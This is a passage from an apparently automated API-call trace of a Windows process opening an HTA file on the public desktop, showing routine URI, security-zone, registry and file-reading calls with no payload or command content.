0x76344680 [0223.685] SysStringLen (param_1="file:///C:/users/public/desktop/info.hta") returned 0x28 [0223.685] CreateUri (in: pwzURI="file:///C:/users/public/desktop/info.hta", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x14f270 | out: ppURI=0x14f270*=0x53c65c) returned 0x0 [0223.685] IUnknown:Release (This=0x53c14c) returned 0x9 [0223.685] IUri:GetScheme (in: This=0x53c65c, pdwScheme=0x14f204 | out: pdwScheme=0x14f204*=0x9) returned 0x0 [0223.685] IUri:IsEqual (in: This=0x53c4ac, pUri=0x53c65c, pfEqual=0x14f24c | out: pfEqual=0x14f24c*=1) returned 0x0 [0223.685] IUnknown:AddRef (This=0x53c4ac) returned 0x3 [0223.685] IUri:GetPropertyDWORD (in: This=0x53c4ac, uriProp=0x11, pdwProperty=0x14efe4, dwFlags=0x0 | out: pdwProperty=0x14efe4*=0x9) returned 0x0 [0223.685] IUnknown:Release (This=0x53c4ac) returned 0x2 [0223.746] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x56) returned 0x550a20 [0223.746] IInternetSecurityManager:GetSecurityId (in: This=0x543ed0, pwszUrl="file:///C:/users/public/desktop/info.hta", pbSecurityId=0x14f048, pcbSecurityId=0x14f044*=0x200, dwReserved=0x0 | out: pbSecurityId=0x14f048*=0x66, pcbSecurityId=0x14f044*=0x9) returned 0x0 [0223.746] IInternetSecurityManager:GetSecurityId (in: This=0x744796bc, pwszUrl="file:///C:/users/public/desktop/info.hta", pbSecurityId=0x14f048, pcbSecurityId=0x14f044*=0x200, dwReserved=0x0 | out: pbSecurityId=0x14f048*=0x0, pcbSecurityId=0x14f044*=0x200) returned 0x800c0011 [0223.757] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x550a20 | out: hHeap=0x510000) returned 1 [0223.757] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x53b588 | out: hHeap=0x510000) returned 1 [0223.757] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x9) returned 0x53b588 [0223.757] ParseURLW (in: pcszURL="file:///C:/users/public/desktop/info.hta", ppu=0x14f200 | out: ppu=0x14f200) returned 0x0 [0223.758] GetDC (hWnd=0x0) returned 0xffffffffab0101eb [0223.758] CreateCompatibleBitmap (hdc=0xab0101eb, cx=1, cy=1) returned 0x90506b7 [0223.758] GetDIBits (in: hdc=0xab0101eb, hbm=0x90506b7, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x14edd0, usage=0x0 | out: lpvBits=0x0, lpbmi=0x14edd0) returned 1 [0223.758] GetDIBits (in: hdc=0xab0101eb, hbm=0x90506b7, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x14edd0, usage=0x0 | out: lpvBits=0x0, lpbmi=0x14edd0) returned 1 [0223.758] DeleteObject (ho=0x90506b7) returned 1 [0223.758] GetSysColor (nIndex=0) returned 0xc8c8c8 [0223.758] GetSysColor (nIndex=1) returned 0x0 [0223.758] GetSysColor (nIndex=2) returned 0xd1b499 [0223.758] GetSysColor (nIndex=3) returned 0xdbcdbf [0223.758] GetSysColor (nIndex=4) returned 0xf0f0f0 [0223.758] GetSysColor (nIndex=5) returned 0xffffff [0223.758] GetSysColor (nIndex=6) returned 0x646464 [0223.758] GetSysColor (nIndex=7) returned 0x0 [0223.758] GetSysColor (nIndex=8) returned 0x0 [0223.758] GetSysColor (nIndex=9) returned 0x0 [0223.758] GetSysColor (nIndex=10) returned 0xb4b4b4 [0223.758] GetSysColor (nIndex=11) returned 0xfcf7f4 [0223.758] GetSysColor (nIndex=12) returned 0xababab [0223.758] GetSysColor (nIndex=13) returned 0xff9933 [0223.758] GetSysColor (nIndex=14) returned 0xffffff [0223.758] GetSysColor (nIndex=15) returned 0xf0f0f0 [0223.758] GetSysColor (nIndex=16) returned 0xa0a0a0 [0223.758] GetSysColor (nIndex=17) returned 0x6d6d6d [0223.758] GetSysColor (nIndex=18) returned 0x0 [0223.758] GetSysColor (nIndex=19) returned 0x544e43 [0223.758] GetSysColor (nIndex=20) returned 0xffffff [0223.758] GetSysColor (nIndex=21) returned 0x696969 [0223.758] GetSysColor (nIndex=22) returned 0xe3e3e3 [0223.758] GetSysColor (nIndex=23) returned 0x0 [0223.758] GetSysColor (nIndex=24) returned 0xe1ffff [0223.758] GetSysColor (nIndex=25) returned 0x0 [0223.758] GetSysColor (nIndex=26) returned 0xcc6600 [0223.758] GetSysColor (nIndex=27) returned 0xead1b9 [0223.758] GetSysColor (nIndex=28) returned 0xf2e4d7 [0223.758] GetSysColor (nIndex=29) returned 0xff9933 [0223.758] GetSysColor (nIndex=30) returned 0xf0f0f0 [0223.758] GetSysColor (nIndex=31) returned 0x0 [0223.758] GetSysColor (nIndex=32) returned 0x0 [0223.758] GetSysColor (nIndex=33) returned 0x0 [0223.758] GetSysColor (nIndex=34) returned 0x0 [0223.758] GetSysColor (nIndex=35) returned 0x0 [0223.758] GetSysColor (nIndex=36) returned 0x0 [0223.759] GetSysColor (nIndex=37) returned 0x0 [0223.759] GetSysColor (nIndex=38) returned 0x0 [0223.759] GetSysColor (nIndex=39) returned 0x0 [0223.759] GetSysColor (nIndex=40) returned 0x0 [0223.759] GetSysColor (nIndex=41) returned 0x0 [0223.759] GetSysColor (nIndex=42) returned 0x0 [0223.759] GetSysColor (nIndex=43) returned 0x0 [0223.759] GetSysColor (nIndex=44) returned 0x0 [0223.759] GetSysColor (nIndex=45) returned 0x0 [0223.759] GetSysColor (nIndex=46) returned 0x0 [0223.759] GetSysColor (nIndex=47) returned 0x0 [0223.759] GetSysColor (nIndex=48) returned 0x0 [0223.759] GetSysColor (nIndex=49) returned 0x0 [0223.759] GetSysColor (nIndex=50) returned 0x0 [0223.759] GetSysColor (nIndex=51) returned 0x0 [0223.759] GetSysColor (nIndex=52) returned 0x0 [0223.759] GetSysColor (nIndex=53) returned 0x0 [0223.759] GetSysColor (nIndex=54) returned 0x0 [0223.759] GetSysColor (nIndex=55) returned 0x0 [0223.759] GetSysColor (nIndex=56) returned 0x0 [0223.759] GetSysColor (nIndex=57) returned 0x0 [0223.759] GetSysColor (nIndex=58) returned 0x0 [0223.759] GetSysColor (nIndex=59) returned 0x0 [0223.759] GetSysColor (nIndex=60) returned 0x0 [0223.759] GetSysColor (nIndex=61) returned 0x0 [0223.759] GetSysColor (nIndex=62) returned 0x0 [0223.759] GetSysColor (nIndex=63) returned 0x0 [0223.759] GetDeviceCaps (hdc=0xab0101eb, index=38) returned 32409 [0223.759] ReleaseDC (hWnd=0x0, hDC=0xab0101eb) returned 1 [0223.760] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x50) returned 0x54de88 [0223.760] GetCursorPos (in: lpPoint=0x14f050 | out: lpPoint=0x14f050*(x=751, y=143)) returned 1 [0223.760] GetKeyState (nVirtKey=16) returned 0 [0223.760] GetKeyState (nVirtKey=17) returned 0 [0223.760] GetKeyState (nVirtKey=18) returned 0 [0223.760] GetKeyState (nVirtKey=160) returned 0 [0223.760] GetKeyState (nVirtKey=162) returned 0 [0223.760] GetKeyState (nVirtKey=164) returned 0 [0223.760] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x30) returned 0x52d7e0 [0223.760] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x28) returned 0x5524e0 [0223.760] GetProcAddress (hModule=0x76340000, lpProcName=0x8) returned 0x76343ed5 [0223.760] GetCurrentThreadId () returned 0xc4 [0223.760] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x52d7e0 | out: hHeap=0x510000) returned 1 [0223.760] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x56) returned 0x550a20 [0223.760] ParseURLW (in: pcszURL="file:///C:/users/public/desktop/info.hta", ppu=0x14f1f0 | out: ppu=0x14f1f0) returned 0x0 [0223.760] CreateUri (in: pwzURI="file:///C:/users/public/desktop/info.hta", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x14f1d4 | out: ppURI=0x14f1d4*=0x53c4ac) returned 0x0 [0223.760] IUnknown:AddRef (This=0x53c4ac) returned 0x5 [0223.760] IInternetSecurityManager:MapUrlToZone (in: This=0x744796bc, pwszUrl="file:///C:/users/public/desktop/info.hta", pdwZone=0x14f174, dwFlags=0x0 | out: pdwZone=0x14f174*=0xffffffff) returned 0x800c0011 [0223.762] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0223.762] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0223.762] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0223.762] IInternetSecurityManager:ProcessUrlAction (in: This=0x744796bc, pwszUrl="file:///C:/users/public/desktop/info.hta", dwAction=0x2700, pPolicy=0x14f178, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x14f178*=0x0) returned 0x0 [0223.762] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0223.762] IUnknown:Release (This=0x53c4ac) returned 0x4 [0223.762] IUnknown:Release (This=0x53c4ac) returned 0x3 [0223.762] IUnknown:AddRef (This=0x53c4ac) returned 0x4 [0223.762] IUri:GetPropertyDWORD (in: This=0x53c4ac, uriProp=0x11, pdwProperty=0x14efac, dwFlags=0x0 | out: pdwProperty=0x14efac*=0x9) returned 0x0 [0223.762] IUnknown:Release (This=0x53c4ac) returned 0x3 [0223.762] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x56) returned 0x550c00 [0223.762] IInternetSecurityManager:GetSecurityId (in: This=0x543ed0, pwszUrl="file:///C:/users/public/desktop/info.hta", pbSecurityId=0x14f008, pcbSecurityId=0x14f004*=0x200, dwReserved=0x0 | out: pbSecurityId=0x14f008*=0x66, pcbSecurityId=0x14f004*=0x9) returned 0x0 [0223.762] IInternetSecurityManager:GetSecurityId (in: This=0x744796bc, pwszUrl="file:///C:/users/public/desktop/info.hta", pbSecurityId=0x14f008, pcbSecurityId=0x14f004*=0x200, dwReserved=0x0 | out: pbSecurityId=0x14f008*=0x0, pcbSecurityId=0x14f004*=0x200) returned 0x800c0011 [0223.762] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x550c00 | out: hHeap=0x510000) returned 1 [0223.762] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0223.762] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x9) returned 0x54b928 [0223.763] CoInternetGetSession (in: dwSessionMode=0x0, ppIInternetSession=0x14f22c, dwReserved=0x0 | out: ppIInternetSession=0x14f22c*=0x545750) returned 0x0 [0223.763] IInternetSession:RegisterNameSpace (This=0x545750, pCF=0x74478c50, rclsid=0x74079790, pwzProtocol="res", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0 [0223.763] IUnknown:AddRef (This=0x74478c50) returned 0x1 [0223.763] IInternetSession:RegisterNameSpace (This=0x545750, pCF=0x74478c70, rclsid=0x74079780, pwzProtocol="about", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0 [0223.763] IUnknown:AddRef (This=0x74478c70) returned 0x1 [0223.763] StrCmpICW (pszStr1="file:///C:/users/public/desktop/info.hta", pszStr2="res://ieframe.dll/PhishSite.htm") returned -12 [0223.763] IUnknown:QueryInterface (in: This=0x53c14c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14f19c | out: ppvObject=0x14f19c*=0x53c14c) returned 0x0 [0223.763] IUnknown:Release (This=0x53c14c) returned 0x9 [0223.764] IUnknown:AddRef (This=0x53c14c) returned 0xa [0223.764] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x12c) returned 0x552e78 [0223.764] IUnknown:AddRef (This=0x53c14c) returned 0xb [0223.764] IUnknown:QueryInterface (in: This=0x53c14c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14f160 | out: ppvObject=0x14f160*=0x53c14c) returned 0x0 [0223.764] IUnknown:Release (This=0x53c14c) returned 0xb [0223.764] IUnknown:AddRef (This=0x53c14c) returned 0xc [0223.764] IUnknown:Release (This=0x53c14c) returned 0xb [0223.764] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x3c) returned 0x5241f8 [0223.764] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xb4) returned 0x552fb0 [0223.764] IUri:GetScheme (in: This=0x53c14c, pdwScheme=0x14f1e4 | out: pdwScheme=0x14f1e4*=0x9) returned 0x0 [0223.764] IUri:IsEqual (in: This=0x53c4ac, pUri=0x53c14c, pfEqual=0x14f22c | out: pfEqual=0x14f22c*=1) returned 0x0 [0223.764] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0223.764] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x4c) returned 0x54dee0 [0223.764] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x12) returned 0x5336b8 [0223.764] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x60) returned 0x553070 [0223.764] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x30) returned 0x52d818 [0223.765] PostMessageW (hWnd=0x2019a, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0223.765] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x12c) returned 0x5530d8 [0223.765] IUnknown:AddRef (This=0x53c14c) returned 0xc [0223.765] IUnknown:QueryInterface (in: This=0x53c14c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14f180 | out: ppvObject=0x14f180*=0x53c14c) returned 0x0 [0223.765] IUnknown:Release (This=0x53c14c) returned 0xc [0223.765] IUnknown:AddRef (This=0x53c14c) returned 0xd [0223.765] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x4c) returned 0x54df38 [0223.765] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x68) returned 0x553a60 [0223.765] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x108) returned 0x553ad0 [0223.765] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x553278 [0223.765] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xcc) returned 0x53cb60 [0223.765] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x553290 [0223.765] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x30) returned 0x52d850 [0223.765] IUnknown:QueryInterface (in: This=0x53c14c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14ee84 | out: ppvObject=0x14ee84*=0x53c14c) returned 0x0 [0223.765] IUnknown:Release (This=0x53c14c) returned 0xd [0223.765] IUnknown:AddRef (This=0x53c14c) returned 0xe [0223.765] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0223.765] IUnknown:AddRef (This=0x53c14c) returned 0xf [0223.765] IUnknown:AddRef (This=0x53c14c) returned 0x10 [0223.765] IUnknown:QueryInterface (in: This=0x53c14c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14ee78 | out: ppvObject=0x14ee78*=0x53c14c) returned 0x0 [0223.765] IUnknown:Release (This=0x53c14c) returned 0x10 [0223.765] IUnknown:AddRef (This=0x53c14c) returned 0x11 [0223.765] IUri:GetScheme (in: This=0x53c14c, pdwScheme=0x553ce8 | out: pdwScheme=0x553ce8*=0x9) returned 0x0 [0223.766] IMoniker:IsSystemMoniker (in: This=0x5205b0, pdwMksys=0x14eee0 | out: pdwMksys=0x14eee0*=0x6) returned 0x0 [0223.766] CoInternetParseIUri (in: pIUri=0x53c14c, ParseAction=0x9, dwFlags=0x0, pwzResult=0x14eef0, cchResult=0x104, pcchResult=0x14ee94, dwReserved=0x0 | out: pwzResult="C:\\users\\public\\desktop\\info.hta", pcchResult=0x14ee94) returned 0x0 [0223.766] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x46) returned 0x529590 [0223.766] FindFirstFileW (in: lpFileName="C:\\users\\public\\desktop\\info.hta", lpFindFileData=0x14ec20 | out: lpFindFileData=0x14ec20) returned 0x54f3a8 [0223.766] FindClose (in: hFindFile=0x54f3a8 | out: hFindFile=0x54f3a8) returned 1 [0223.766] IUnknown:QueryInterface (in: This=0x53c14c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14ee84 | out: ppvObject=0x14ee84*=0x53c14c) returned 0x0 [0223.766] IUnknown:Release (This=0x53c14c) returned 0x11 [0223.766] IUnknown:AddRef (This=0x53c14c) returned 0x12 [0223.796] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x10) returned 0x5532a8 [0223.796] IInternetSession:CreateBinding (in: This=0x545750, pbc=0x0, szUrl="file:///C:/users/public/desktop/info.hta", pUnkOuter=0x0, ppunk=0x0, ppOInetProt=0x5532b0, dwOption=0x0 | out: ppunk=0x0, ppOInetProt=0x5532b0*=0x555258) returned 0x0 [0223.797] IUnknown:QueryInterface (in: This=0x555258, riid=0x74096078*(Data1=0x53c84785, Data2=0x8425, Data3=0x4dc5, Data4=([0]=0x97, [1]=0x1b, [2]=0xe5, [3]=0x8d, [4]=0x9c, [5]=0x19, [6]=0xf9, [7]=0xb6)), ppvObject=0x14ee08 | out: ppvObject=0x14ee08*=0x0) returned 0x80004002 [0223.797] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14eda4 | out: phkResult=0x14eda4*=0x1dc) returned 0x0 [0223.797] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14eda8 | out: phkResult=0x14eda8*=0x1e4) returned 0x0 [0223.798] RegOpenKeyExW (in: hKey=0x1e4, lpSubKey="FEATURE_XSSFILTER", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed64 | out: phkResult=0x14ed64*=0x0) returned 0x2 [0223.798] RegOpenKeyExW (in: hKey=0x1dc, lpSubKey="FEATURE_XSSFILTER", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed64 | out: phkResult=0x14ed64*=0x1e8) returned 0x0 [0223.798] SHRegGetValueW () returned 0x2 [0223.798] SHRegGetValueW () returned 0x2 [0223.798] RegCloseKey (hKey=0x1e8) returned 0x0 [0223.798] RegCloseKey (hKey=0x0) returned 0x6 [0223.798] RegCloseKey (hKey=0x0) returned 0x6 [0223.798] RegCloseKey (hKey=0x1dc) returned 0x0 [0223.798] RegCloseKey (hKey=0x1e4) returned 0x0 [0223.798] IUnknown:AddRef (This=0x555258) returned 0x2 [0223.798] IUnknown:QueryInterface (in: This=0x555258, riid=0x74096158*(Data1=0xc7a98e66, Data2=0x1010, Data3=0x492c, Data4=([0]=0xa1, [1]=0xc8, [2]=0xc8, [3]=0x9, [4]=0xe1, [5]=0xf7, [6]=0x59, [7]=0x5)), ppvObject=0x14ee4c | out: ppvObject=0x14ee4c*=0x555258) returned 0x0 [0223.798] IInternetProtocolEx:StartEx (This=0x555258, pUri=0x53c14c, pOIProtSink=0x553c34, pOIBindInfo=0x553bfc, grfPI=0x10, dwReserved=0x0) returned 0x0 [0223.798] IUnknown:AddRef (This=0x553c34) returned 0x3 [0223.798] IUnknown:AddRef (This=0x553bfc) returned 0x4 [0223.798] IUnknown:QueryInterface (in: This=0x553bfc, riid=0x75326f40*(Data1=0xa3e015b7, Data2=0xa82c, Data3=0x4dcd, Data4=([0]=0xa1, [1]=0x50, [2]=0x56, [3]=0x9a, [4]=0xee, [5]=0xed, [6]=0x36, [7]=0xab)), ppvObject=0x14edf4 | out: ppvObject=0x14edf4*=0x0) returned 0x80004002 [0223.799] IInternetBindInfo:GetBindInfo (in: This=0x553bfc, grfBINDF=0x5553c8, pbindinfo=0x5553d0 | out: grfBINDF=0x5553c8*=0x20083, pbindinfo=0x5553d0) returned 0x0 [0223.799] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed50 | out: phkResult=0x14ed50*=0x1e4) returned 0x0 [0223.799] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed54 | out: phkResult=0x14ed54*=0x1dc) returned 0x0 [0223.799] RegOpenKeyExW (in: hKey=0x1dc, lpSubKey="FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed10 | out: phkResult=0x14ed10*=0x0) returned 0x2 [0223.799] RegOpenKeyExW (in: hKey=0x1e4, lpSubKey="FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed10 | out: phkResult=0x14ed10*=0x0) returned 0x2 [0223.799] RegCloseKey (hKey=0x0) returned 0x6 [0223.799] RegCloseKey (hKey=0x0) returned 0x6 [0223.799] RegCloseKey (hKey=0x1e4) returned 0x0 [0223.799] RegCloseKey (hKey=0x1dc) returned 0x0 [0223.799] IUnknown:AddRef (This=0x553c34) returned 0x5 [0223.844] IInternetProtocolSink:ReportProgress (This=0x553c34, ulStatusCode=0xb, szStatusText="") returned 0x0 [0223.844] IInternetProtocolSink:ReportProgress (This=0x553c34, ulStatusCode=0xe, szStatusText="C:\\users\\public\\desktop\\info.hta") returned 0x0 [0223.844] GetCurrentProcessId () returned 0x774 [0223.844] IInternetProtocolSink:ReportProgress (This=0x553c34, ulStatusCode=0xd, szStatusText="application/hta") returned 0x0 [0223.845] RegisterClipboardFormatA (lpszFormat="text/html") returned 0xc11f [0223.845] RegisterClipboardFormatA (lpszFormat="text/plain") returned 0xc120 [0223.845] RegisterClipboardFormatA (lpszFormat="text/x-component") returned 0xc150 [0223.845] RegisterClipboardFormatA (lpszFormat="image/gif") returned 0xc12b [0223.845] RegisterClipboardFormatA (lpszFormat="image/jpeg") returned 0xc12d [0223.845] RegisterClipboardFormatA (lpszFormat="image/pjpeg") returned 0xc12c [0223.845] RegisterClipboardFormatA (lpszFormat="image/bmp") returned 0xc131 [0223.845] RegisterClipboardFormatA (lpszFormat="image/x-jg") returned 0xc132 [0223.845] RegisterClipboardFormatA (lpszFormat="image/x-art") returned 0xc133 [0223.845] RegisterClipboardFormatA (lpszFormat="image/x-wmf") returned 0xc135 [0223.845] RegisterClipboardFormatA (lpszFormat="image/x-emf") returned 0xc134 [0223.845] RegisterClipboardFormatA (lpszFormat="video/avi") returned 0xc137 [0223.845] RegisterClipboardFormatA (lpszFormat="video/x-msvideo") returned 0xc138 [0223.845] RegisterClipboardFormatA (lpszFormat="video/mpeg") returned 0xc139 [0223.845] RegisterClipboardFormatA (lpszFormat="video/quicktime") returned 0xc151 [0223.845] RegisterClipboardFormatA (lpszFormat="application/hta") returned 0xc152 [0223.845] RegisterClipboardFormatA (lpszFormat="image/x-png") returned 0xc12f [0223.845] RegisterClipboardFormatA (lpszFormat="image/png") returned 0xc130 [0223.845] RegisterClipboardFormatA (lpszFormat="image/x-icon") returned 0xc136 [0223.845] StrCmpICW (pszStr1="application/hta", pszStr2="text/xml") returned -19 [0223.845] StrCmpNICW (lpStr1="applicat", lpStr2="text/css", nChar=8) returned -19 [0223.845] IInternetProtocolSink:ReportData (This=0x553c34, grfBSCF=0x5, ulProgress=0x200a, ulProgressMax=0x200a) returned 0x0 [0223.845] IUnknown:QueryInterface (in: This=0x555258, riid=0x740b9460*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x14d31c | out: ppvObject=0x14d31c*=0x0) returned 0x80004002 [0223.845] IUnknown:QueryInterface (in: This=0x555258, riid=0x74034588*(Data1=0x79eac9d6, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x14d314 | out: ppvObject=0x14d314*=0x0) returned 0x80004002 [0223.846] IInternetProtocolSink:ReportResult (This=0x553c34, hrResult=0x0, dwError=0x0, szResult=0x0) returned 0x0 [0223.846] IUnknown:Release (This=0x555258) returned 0x2 [0223.846] IUnknown:Release (This=0x53c14c) returned 0x13 [0223.846] IUnknown:Release (This=0x53c14c) returned 0x12 [0223.846] IUnknown:Release (This=0x53c14c) returned 0x11 [0223.846] CoTaskMemFree (pv=0x0) [0223.846] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x1a8) returned 0x553d98 [0223.846] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f138 | out: lpCPInfo=0x14f138) returned 1 [0223.846] IUnknown:AddRef (This=0x545750) returned 0x3 [0223.846] IUnknown:AddRef (This=0x53c14c) returned 0x12 [0223.846] IUnknown:QueryInterface (in: This=0x53c14c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14f140 | out: ppvObject=0x14f140*=0x53c14c) returned 0x0 [0223.846] IUnknown:Release (This=0x53c14c) returned 0x12 [0223.846] IUnknown:AddRef (This=0x53c14c) returned 0x13 [0223.846] IUri:GetScheme (in: This=0x53c14c, pdwScheme=0x14f144 | out: pdwScheme=0x14f144*=0x9) returned 0x0 [0223.846] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7406e718, lpParameter=0x550cc0, dwCreationFlags=0x0, lpThreadId=0x550cd4 | out: lpThreadId=0x550cd4*=0x5bc) returned 0x1a4 [0223.847] GetCurrentThreadId () returned 0xc4 [0223.847] GetCurrentThreadId () returned 0xc4 [0223.848] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x52) returned 0x550d20 [0223.848] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0223.848] MulDiv (nNumber=8202, nNumerator=4000, nDenominator=8202) returned 4000 [0223.848] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x56) returned 0x550d80 [0223.848] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x128) returned 0x555d38 [0223.848] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x53b630 [0223.848] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x46) returned 0x554270 [0223.848] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x100) returned 0x555e68 [0223.848] IInternetProtocol:Read (in: This=0x555258, pv=0x555e74, cb=0xc8, pcbRead=0x14f088 | out: pv=0x555e74, pcbRead=0x14f088*=0xc8) returned 0x0 [0223.849] CoInternetIsFeatureEnabledForUrl (FeatureEntry=0x3, dwFlags=0x2, szURL="file:///C:/users/public/desktop/info.hta", pSecMgr=0x0) returned 0x1 [0223.849] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14f010 | out: phkResult=0x14f010*=0x1b8) returned 0x0 [0223.849] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14f014 | out: phkResult=0x14f014*=0x1f0) returned 0x0 [0223.849] RegOpenKeyExW (in: hKey=0x1f0, lpSubKey="FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE", ulOptions=0x0, samDesired=0x1, phkResult=0x14efd0 | out: phkResult=0x14efd0*=0x0) returned 0x2 [0223.849] RegOpenKeyExW (in: hKey=0x1b8, lpSubKey="FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE", ulOptions=0x0, samDesired=0x1, phkResult=0x14efd0 | out: phkResult=0x14efd0*=0x0) returned 0x2 [0223.850] RegCloseKey (hKey=0x0) 